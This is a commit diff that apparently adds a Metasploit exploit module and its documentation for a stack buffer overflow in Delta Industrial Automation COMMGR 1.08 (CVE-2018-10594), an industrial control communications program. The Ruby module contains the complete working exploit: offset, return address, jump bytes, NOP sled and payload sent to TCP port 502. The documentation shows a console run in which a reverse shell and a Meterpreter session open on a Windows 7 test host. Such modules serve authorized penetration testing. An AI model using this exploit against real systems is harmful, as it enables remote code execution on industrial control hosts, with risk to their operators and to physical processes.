Added exploit module for Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow
parent
5b6938e942
commit
9ae17daf46
|
@ -0,0 +1,67 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install Delta Industrial Automation COMMGR 1.08
|
||||
2. Start `msfconsole`
|
||||
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
|
||||
4. Do ```set RHOST <target_ip>```
|
||||
5. Do ```run```
|
||||
6. You should get a shell. :)
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
|
||||
|
||||
```
|
||||
msf > use exploit/windows/scada/delta_ia_commgr_bof
|
||||
msf exploit(windows/scada/delta_ia_commgr_bof) > show options
|
||||
|
||||
Module options (exploit/windows/scada/delta_ia_commgr_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOST yes The target address
|
||||
RPORT 502 yes The target port (TCP)
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 COMMGR 1.08 / Windows Universal
|
||||
|
||||
|
||||
msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
|
||||
RHOST => 192.168.3.64
|
||||
msf exploit(windows/scada/delta_ia_commgr_bof) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.3.150:4444
|
||||
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
|
||||
[*] Sending stage (179779 bytes) to 192.168.3.64
|
||||
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : TEST01
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter > shell
|
||||
Process 932 created.
|
||||
Channel 1 created.
|
||||
Microsoft Windows [Version 6.1.7601]
|
||||
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||
|
||||
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
|
||||
exit
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
|
||||
msf exploit(windows/scada/delta_ia_commgr_bof) >
|
||||
```
|
|
@ -0,0 +1,75 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
|
||||
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
|
||||
crafted packets. This module has been tested successfully on Delta Electronics Delta
|
||||
Industrial Automation COMMGR 1.08 over
|
||||
Windows XP SP3,
|
||||
Windows 7 SP1, and
|
||||
Windows 8.1.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
't4rkd3vilz', # PoC
|
||||
'hubertwslin' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '44965'],
|
||||
[ 'CVE', '2018-10594']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 640,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'COMMGR 1.08 / Windows Universal',
|
||||
{
|
||||
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
|
||||
'Offset' => 4164
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 02 2018',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(502)
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
data = rand_text_alpha(target['Offset'])
|
||||
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
|
||||
data << [target.ret].pack("V")
|
||||
data << make_nops(40)
|
||||
data << payload.encoded
|
||||
|
||||
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
|
||||
connect
|
||||
sock.put(data)
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue